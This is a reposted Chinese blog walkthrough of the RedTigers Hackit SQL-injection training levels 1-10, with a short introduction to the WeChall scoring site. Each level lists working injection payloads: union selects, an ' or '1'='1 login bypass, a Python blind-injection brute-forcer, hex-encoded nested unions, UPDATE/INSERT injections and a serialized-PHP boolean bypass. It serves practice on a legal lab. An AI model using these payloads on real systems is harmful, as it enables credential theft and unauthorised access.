php 0815 wechall,渗透测试演练平台RedTigers Hackit通关writeup以及wechall平台介绍

最新推荐文章于 2024-01-21 16:04:17 发布
最新推荐文章于 2024-01-21 16:04:17 发布
阅读量505 收藏
点赞数
文章标签: php 0815 wechall

本文转载自Redtiger Hackit Writeup

RedTigers Hackit是一个训练SQL注入漏洞和PHP方面的网站,地址为https://redtiger.labs.overthewire.org/。相比hackinglab上面考察的常规SQL注入,redtiger上面的题目更多考察的是对于程序逻辑的思考,需要思考后台php代码是如何编写的。如果有一定的网站编写经验或者是网站的渗透经验,那么做这些题目会比较简单。根据作者的说法,所有的题目都是根据他发现的真实的漏洞编写的。

这个网站也是wechall的合作平台,可以通过做redtiger来获取flag然后提交到wechall上面获取积分。wechall和很多类似于RedTigers Hackit的平台都有合作,这些平台上做题获取flag之后都可以在wechall上面计分并且排名。根据网站上面的要求,不能公布答案,而且题目数据不时会有一些变化,所以这篇文章只是简单写一下做题思路,没有flag。

level 1

常规的SQL注入。先用order by猜有几列,再用union select查出username和password。

0818b9ca8b590ca3270a3433284dd417.png

拿到flag之后到下图这个地方提交,提交之后会显示你得了多少分,之后的题目类似。我对wechall的设计也是无语了,这个提交的页面找了至少半个小时。在首页放一个submit flag的按钮不行吗???

0818b9ca8b590ca3270a3433284dd417.png

level 2

这里我们用常见的万能密码绕过。用户名随意,密码' or '1'='1即可。

0818b9ca8b590ca3270a3433284dd417.png

level 3

题目的提示是Try to get an error。我们点一下TheCow,url变成了http://redtiger.labs.overthewire.org/level3.php?usr=MDYzMjIzMDA2MTU2MTQxMjU0。

0818b9ca8b590ca3270a3433284dd417.png

我们把usr变为一个数组,然后提交试试。

0818b9ca8b590ca3270a3433284dd417.png

顺利得到了报错信息。看看报错信息中的文件。

0818b9ca8b590ca3270a3433284dd417.png

实际上这个文件就是对传进来的参数进行加密和解密。构造的明文为' union select 1,password,2,3,4,5,6 from level3_users where username='Admin,加密后得到

https://redtiger.labs.overthewire.org/level3.php?usr=MDc2MTUxMDIyMTc3MTM5MjMwMTQ1MDI0MjA5MTAwMTc3MTUzMDc0MTg3MDk1MDg0MjQzMDE3MjUyMDI1MTI2MTU2MTc2MTMzMDAwMjQ2MTU2MjA4MTgyMDk2MTI5MjIwMDQ5MDUyMjMwMTk4MTk2MTg5MTEzMDQxMjQwMTQ0MDM2MTQwMTY5MTcyMDgzMjQ0MDg3MTQxMTE1MDY2MTUzMjE0MDk1MDM4MTgxMTY1MDQ3MTE4MDg2MTQwMDM0MDg1MTE4MTE4MDk5MjIyMjE4MDEwMTkwMjIwMDcxMDQwMjIw

0818b9ca8b590ca3270a3433284dd417.png

level 4

主页上也说了,这一关是盲注。那么我们只有写个程序来跑一下了。

import string

from re import *

from urllib.request import *

answer=""

char=string.printable

login ={'Cookie':'level4login=there_is_no_bug'}

url="http://redtiger.labs.overthewire.org/level4.php?id=1%20and%201=(select%20count(*)%20from%20level4_secret%20where%20substr(keyword,{0},1)='{1}')"

for q in range(1,22):

for i in char:

test=(url .format(q,i))

request=Request(test,None,headers=login)

res=urlopen(request)

s=res.read().decode()

if(findall("Query returned 1 rows.",s)):

print("{0} ".format(q)+i)

answer+=i

break

print(answer)

0818b9ca8b590ca3270a3433284dd417.png

level 5

根据提示密码要md5加密,构造出' union select 0x61646d696e as username, md5(123) as password#。

0818b9ca8b590ca3270a3433284dd417.png

level 6

测试http://redtiger.labs.overthewire.org/level6.php?user=1',页面报错,那么说明在user字段是存在注入的。执行到http://redtiger.labs.overthewire.org/level6.php?user=1 order by 6%23,页面报错,那么应该有5个字段。

执行http://redtiger.labs.overthewire.org/level6.php?user=0 union select 1,2,3,4,5 from level6_users where status=1%23显示User not found。

0818b9ca8b590ca3270a3433284dd417.png

执行http://redtiger.labs.overthewire.org/level6.php?user=0 union select 1,username,3,4,5 from level6_users where status=1%23返回了username。

0818b9ca8b590ca3270a3433284dd417.png

无论把password放在哪一位都没有结果,猜想后台进行了两次查询。

$sql1 = select username,password from level6_users where id=xxx;

$sql2 = select username,email from level6_users where username=."'".$username."'";

下面给出我们的payload。

http://redtiger.labs.overthewire.org/level6.php?user=0 union select 1,admin1' union select 1,2,3,password,5 from level6_users where status=1#,3,4,5%23

$sql1 = select username,password from level6_users where id=0 union select 1,admin1' union select 1,2,3,password,5 from level6_users where status=1%23,3,4,5

$sql2 = select username,email from level6_users where username='admin1' union select 1,2,3,password,5 from level6_users where status=1

页面报错,尝试十六进制成功。

http://redtiger.labs.overthewire.org/level6.php?user=0 union select 1,0x61646d696e312720756e696f6e2073656c65637420312c322c332c70617373776f72642c352066726f6d206c6576656c365f7573657273207768657265207374617475733d3123,3,4,5%23

0818b9ca8b590ca3270a3433284dd417.png

level 7

题目上已经说明了,no comments, no substr, no substring, no ascii, no mid, no like。过滤了注释,substr,substring,ascii,mid,like。加一个单引号报错。

0818b9ca8b590ca3270a3433284dd417.png

那么sql语句是SELECT news.*,text.text,text.title FROM level7_news news, level7_texts text WHERE text.id = news.id AND (text.text LIKE '%'%' OR text.title LIKE '%'%')。用order by猜字段,发现order by被屏蔽了,尝试用union select。这里提交数据最好用temper data之类的工具。

0818b9ca8b590ca3270a3433284dd417.png

0818b9ca8b590ca3270a3433284dd417.png

最终,我们可以得到字段长度是4,显示位是3,4。

0818b9ca8b590ca3270a3433284dd417.png

在知道了显示位之后,接下来就需要获取autor的内容。

0818b9ca8b590ca3270a3433284dd417.png

0818b9ca8b590ca3270a3433284dd417.png

提交TestUserforg00gle,得到flag。

0818b9ca8b590ca3270a3433284dd417.png

level 8

在Email处加一个引号,报错。

0818b9ca8b590ca3270a3433284dd417.png

猜测后台的sql语句应该是update table set name='inputname',email='inputemail',icq='inputicq',age='inputage' where id=1,那么我们在Email字段输入hans%40localhost',name=password,icq=',执行的sql语句将会是update table set name='hans%40localhost',name=password,icq='',email='inputemail',icq='inputicq',age='inputage' where id=1。因为在update语句中出现了两个相同的name字段,实际上name字段的值会被赋为后一个。

0818b9ca8b590ca3270a3433284dd417.png

0818b9ca8b590ca3270a3433284dd417.png

level 9

在text中添加引号发现会报错。

0818b9ca8b590ca3270a3433284dd417.png

猜测后台的sql语句应该是insert into tablename(autor,title,text) values ('inputautor','inputtitle','inputtext'),那么我们在text字段输入123'),((select username from level9_users limit 1), (select password from level9_users limit 1),'456,执行的sql语句将会是insert into tablename(autor,title,text) values ('inputautor','inputtitle','123'), ((select username from level9_users limit 1),(select password from level9_users limit 1),'456')。

0818b9ca8b590ca3270a3433284dd417.png

0818b9ca8b590ca3270a3433284dd417.png

0818b9ca8b590ca3270a3433284dd417.png

level 10

同样使用tamper data得到点击login时提交的数据。

0818b9ca8b590ca3270a3433284dd417.png

base64解码得到a:2:{s:8:"username";s:6:"Monkey";s:8:"password";s:12:"0815password";}。

$myarray = array(

"username"=>"Monkey",

"password"=>"0815password",

);题目要求我们用TheMaster登录。把username改成TheMaster,password改成boolean类型的true即可绕过。a:2:{s:8:"username";s:9:"TheMaster";s:8:"password";b:1;},base64编码之后是YToyOntzOjg6InVzZXJuYW1lIjtzOjk6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7YjoxO30=。

0818b9ca8b590ca3270a3433284dd417.png

0818b9ca8b590ca3270a3433284dd417.png

額額
关注
Hack The Box 是一个非常受欢迎的在线平台,主要面向网络安全爱好者、专业渗透测试人员以及希望提升自己在网络安全领域技能
06-22
Hack The Box 是一个非常受欢迎的在线平台,主要面向网络安全爱好者、专业渗透测试人员以及希望提升自己在网络安全领域技能的学生。它提供了一个安全且合法的环境,让参与者能够实践他们的黑客技能,而不必担心法律...
谈谈Wechall几道题
T2hunz1
10-20 642
wechall几道题目解法的记录。
wechall靶场training系列通关记录
andy5434374的博客
01-17 4272
记录一下自己在wechall上的做题过程,也算是一份攻略吧。wechall的Training系列一共36题,涉及范围很广内容很杂,比如web,网络基础,密码学,图片隐写术,编程,SQL注入,数学,算法等。文章写了78页,我自认为是比较详细地阐述了每一题的通关方法和原理。如果文章有错误请大佬们指出。
RedTiger‘s Hackit
Alita_lxz的博客
11-02 1445
RedTiger’s Hackit http://redtiger.labs.overthewire.org/ Level 1 Simple SQL-Injection 打开对应连接,是一个登录页面,先是告诉我们登录的用户名是什么,然后给了一个提示,把表名level1_users给出来了,现在就是要找注入点在哪里了,看到Category:后的1可以点击 点击之后出来cat=1,这就很明显了 试了一大顿,发现这个1后竟然不需要闭合引号,根据order by 得出表有4列 本来想爆一下列名,可能是有参数被
WeChall
最新发布
m0_62670778的博客
01-21 1062
下,所以进入其根目录找找是不是有:https://www.wechall.net/robots.txt。3、使用010editor工具打开文件进行信息查看(用记事本打开也可以看见):发现密码。2、解出来的明文给出了一个链接地址,访问该链接地址:直接成功破解!2、下载完成后对图像的消息进行查看,看有没有密码消息:没有发现。1、复制ascii码值,将对应的ascii码转换成字符串。1、访问robots.txt 文件:发现没有该文件。2、考虑到robots.txt一般放在。2、提交:解题成功!
30 天渗透测试练习2.pdf
10-06
7. **HackTheBox (HTB) 机器**:HTB是一个在线平台,提供了多种级别的虚拟机,用于提升渗透测试技能。例如Pilgrimage、Topology、PC、Busqueda等,每个机器都有不同的攻防挑战。 8. **基于路由的SSRF(Server-Side ...
30 天渗透测试练习1.pdf
10-06
"30天渗透测试练习1.pdf" 提供了一个自我学习和实践的计划,旨在通过一系列的在线平台和虚拟环境来提升安全技能。这个计划没有特定的顺序或时间限制,你可以根据自己的进度自由安排。 1. **Try Hack Me房间:OWASP ...
渗透测试挖掘漏洞获取CNVD证书的经验分享
08-21
CNVD证书是国家信息安全漏洞共享平台(China National Vulnerability Database)颁发的证书,证明了渗透测试员的原创性贡献。该证书是对白帽子原创性贡献的证书证明,现在很多单位招聘安全人员都会优先考虑有漏洞...
新手指南:手把手教你如何搭建自己的渗透测试环境1
08-08
渗透测试新手指南:搭建自己的渗透测试环境】 渗透测试是一种合法的安全评估方法,由白帽黑客模拟黑帽黑客的行为,以发现并修复系统的漏洞和弱点。在这个过程中,我们需要遵循法律和道德规范,确保在自己的环境中...
writeup--RedTiger's Hackit
charlie_heng的专栏
12-19 4194
RedTiger’s Hackit第一关首先点进Category 1 网址后面跟了?cat=1,很明显是一个sql注入 看了下还给了表名。。Tablename: level1_users 构造了下 https://redtiger.labs.overthewire.org/level1.php?cat=1 union select 1,2,username,password from le
网络攻防路-wechall
大紫明宫空离境
12-10 437
1Training: Get Sourced 查看网页源代码 2Training: Stegano 隐写术,下载图片,用工具打开。 3Crypto - Caesar 凯撒加密 4Training: WWW-Robots 查看网页robots http://www.wechall.net/robots.txt 5Training: ASCII ASCII...
RedTiger‘s Hackit练习sql漏洞
weixin_43939527的博客
10-18 622
level1 level1打开界面如下图 通过http://redtiger.labs.overthewire.org/level1.php?cat=1 ’ http://redtiger.labs.overthewire.org/level1.php?cat=1 and 1=1 http://redtiger.labs.overthewire.org/level1.php?cat=1 and 1=2 测试,发现这是一个数字型sql注入漏洞 知道存在漏洞后,我们通过order by判断数据表的列数 这个
Wechall Wireup(一)
Jun_ay的博客
10-19 1779
1. Training: Tracks (HTTP)1、进入投票页面 点击 + 号, 再次点击进行投票。 此时完成第一次投票。进行第二次时会报错。 这时,我们将VOTE cookie删掉,如果不删会导致后续不成功。 打开burp suite,抓包改包。修改If-None-Match的值,请求更新数据,因为服务器一开始会分配Etag,然后下次检测时会对比两者的值,如果一样就不更
萌新的wechall之旅
dkfagk4904的博客
07-30 239
Training Training: Get Sourced (Training) 根据题目要求查看源码即可get Training: Stegano I 图片下载 记事本打开即可get Crypto - Caesar I 经典的凯撒密码,网上找个在线解密网站,直到句子是可读的英文即可get WWW-Robots robots协议,在wechall根目录访问 robots.txt 获得答...
WeChall刷题(一)
leeham的博客
08-14 8192
2017.08.14这两天开始刷ctf的题目,首先看了i春秋上边的ctf入门视频,了解到很多刷题网站,分享如下: http://pwdme.cc/tag/idf%E5%AE%9E%E9%AA%8C%E5%AE%A4/ https://microcorruption.com/login http://smashthestack.org/ http://overthewire.org/warga
RedTiger's Hackit(level2)
xz913400155的博客
12-11 500
第二关 简单的sql绕过 https://redtiger.labs.overthewire.org/ 进入第二关 给的目标是登入 提示是条件 然后就给了用户名及密码两个输入框 很容易就联想到输入内容就是查询语句中where的判断条件 账号密码一般都是用字符串格式 所以猜测where语句差不多是如下格式 where username=‘我们的输入’ and password=‘我们的输入’ 然...
RedTiger‘s Hackit -- level 10
qq_42303523的博客
07-27 1150
RegTiger's hackit level 10的解法和原理
RedTiger's Hackit Level 1
GTMer的专栏
10-27 1183
测试发现cat = 1有返回,其他均报错 http://redtiger.labs.overthewire.org/level1.php?cat=1 其后接and 1 =1 和 and 1= 2 有不同反馈,存在注入 union select 1,2,3,4  发现存在4列,显示第3、4列 尝试从information_sechema读取数据,提示disabled。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值